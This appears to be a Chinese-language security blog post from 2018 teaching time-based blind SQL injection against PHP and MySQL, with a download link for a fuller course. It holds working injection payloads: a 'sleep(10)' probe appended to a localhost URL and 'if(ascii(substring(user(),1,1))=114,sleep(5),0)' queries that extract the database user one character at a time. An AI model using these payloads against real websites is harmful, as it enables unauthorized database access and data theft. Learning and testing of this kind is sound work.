?

Jan 20 2018

【原創】(PHP+MYSQL(延時注入和注入工具編寫)

首頁 » 原創作品 » 【原創】(PHP+MYSQL(延時注入和注入工具編寫)   

【原創】(PHP+MYSQL(延時注入和注入工具編寫)

【原創】(PHP+MYSQL(延時注入和注入工具編寫)


這是以前培訓錄制的一個課程 現在分享出來給大家學習吧。


1.jpg


延時注入 等于時間差注入

 

延時注入往往用于難于判斷頁面 是否存在注入漏洞的檢測方法。

 

延時注入的原理:在mysql中存在sleep函數,這個函數是主要讓數據庫查詢的結果,等待多少秒返回給客戶端,可以使用這個函數構造注入語句加以判斷即可。

 

Sleep

select sleep(10)

 

if

select if('x'='y',1,0)

 

select if('x'='x',sleep(5),0)

 

判斷是否存在注入

http://localhost/sql/sleep.php?id=1%20and%20sleep(10)

 

出數據

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

首先要判斷這個字符串的長度select LENGTH(user()) 14

 

selectif(ascii(substring(user(),1,1))=114,sleep(5),0)

 

select if(ascii(substring(user(),2,1))=114,sleep(5),0)

 

payloads='[email protected]_.'

 

判斷第一個

 

root@localhost

 

就是延時注入得到數據的原理


教程下載


鏈接:https://pan.baidu.com/s/1smCSyXv 密碼:h0fw


我的微信公眾號 不定期更新一些滲透技巧和教程

qrcode_for_gh_ceb74c1acd23_258.jpg


正文部分到此結束

文章標簽:這篇文章木有標簽

版權聲明:若無特殊注明,本文皆為( mOon )原創,轉載請保留文章出處。

也許喜歡: «【原創】AngelSword(天使之劍)漏洞框架的使用 | Burp1.7.26 永久版本»

你腫么看?

你還可以輸入 250/250 個字

? 微笑 大笑 拽 大哭 親親 流汗 噴血 奸笑 囧 不爽 暈 示愛 害羞 吃驚 驚嘆 愛你 嚇死了 呵呵

評論信息框

這篇文章還沒有收到評論,趕緊來搶沙發吧~

?
?
河北11选5开奖